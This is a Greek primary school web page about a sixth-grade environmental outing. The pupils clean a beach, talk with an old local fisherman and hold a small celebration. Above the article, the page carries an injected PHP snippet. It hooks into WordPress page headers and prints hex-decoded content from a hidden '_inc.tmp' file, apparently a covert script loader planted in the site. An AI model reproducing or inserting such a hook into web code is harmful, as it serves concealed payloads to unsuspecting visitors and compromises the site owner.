if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Μεσόγειος SOS – εκπαιδευτικό πρόγραμμα |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Μεσόγειος SOS – εκπαιδευτικό πρόγραμμα

Οι μαθητές της ΣΤ΄ τάξης επισκέφθηκαν την περιοχή Πλάκα και συμμετείχαν, μαζί με όλο το σχολείο και τη συμμετοχή του Νηπιαγωγείου Λεωνιδίου, στον καθαρισμό της παραλίας. Παράλληλα ενημερώθηκαν από τους εκπαιδευτικούς του σχολείου, τους εκπροσώπους του “Φορέα Διαχείρισης Όρους Πάρνωνα και Υγροτόπου Μουστού” καθώς και από τον εκπρόσωπο του Λιμενικού σταθμού για την ανάγκη προστασίας των ακτών της περιοχής μας που αποτελούν άλλωστε κληρονομιά όχι μόνο των κατοίκων της αλλά και ολόκληρου του πληθυσμού του πλανήτη Γη. Οι μαθητές κατανόησαν ότι πρέπει να προσπαθήσουμε όλοι μαζί, μικροί και μεγάλοι, να επαναδιαμορφώσουμε τη στάση μας και τη συμπεριφορά μας απέναντι στο φυσικό περιβάλλον.
Οι μαθητές της ΣΤ είχαν την ευκαιρία να συζητήσουν με έναν από τους παλαιότερους ψαράδες της περιοχής μας τον κ. Ρουσάλη Νίκο, για τον τρόπο ψαρέματος τα παλιά χρόνια, τις δυσκολίες στην ανοικτή θάλασσα, τις οικονομικές δυσκολίες του παρελθόντος, την αγάπη για το επάγγελμα και για τη θάλασσα, καθώς και για την ανάγκη γνώσης των καιρικών φαινομένων, αφού δεν υπήρχαν τις προηγούμενες εποχές τα κατάλληλα μέσα γνώσης εκ των προτέρων του καιρού και των καιρικών φαινομένων ανά ώρα ή ημέρα. Σημαντική η παρατήρηση του αγαπητού κ. Ρουσάλη για την κατακόρυφη αύξηση των ανθρώπων που ψαρεύουν και της αντίστοιχης μείωσης των αλιευμάτων για την περιοχή μας.
Η ημέρα τελείωσε με μια μικρή γιορτή που πραγματοποιήθηκε στην παραλία, όπου όλοι μαθητές και οι εκπαιδευτικοί ένωσαν το κέφι τους και διασκέδασαν μέχρι τη λήξη του εκπαιδευτικού ωραρίου.
Η σημερινή εκπαιδευτική σημαντική περιβαλλοντική δραστηριότητα έδειξε στους μαθητές μας ότι το μάθημα δεν πραγματοποιείται μόνο μέσα σε αίθουσες και τοίχους. Ένα εκπαιδευτικό θέμα έχει σημασία κι επιτυχία όταν καταφέρνουμε να φέρουμε τους μαθητές σε απευθείας επαφή με το γνωστικό αντικείμενο και να το παρατηρούν δια ζώσης και κυρίως να συζητούν με εκπροσώπους φορέων, επαγγελματίες και συμπολίτες μας.
Ένα σύγχρονο σχολείο, μια σύγχρονη εκπαίδευση διαδικασία αναδεικνύεται και εξελίσσεται όταν συνδυάζονται θεωρία με πράξη και σύνδεση του σχολείου με την τοπική κοινωνία. Το Δημοτικό σχολείο Λεωνιδίου έχει πάντα ανοικτή την πόρτα του στην τοπική κι ευρύτερη κοινωνία, ακολουθώντας πάντα συγκεκριμένους κανόνες και αρχές.
Ο δάσκαλος του ΣΤ1 Ηλίας Βλάχος.

SAM_0206.JPG SAM_0208.JPG SAM_0211.JPG SAM_0215.JPG SAM_0216.JPG SAM_0227.JPG SAM_0239.JPG SAM_0243.JPG SAM_0244.JPG SAM_0245.JPG SAM_0248.JPG SAM_0254.JPG SAM_0257.JPG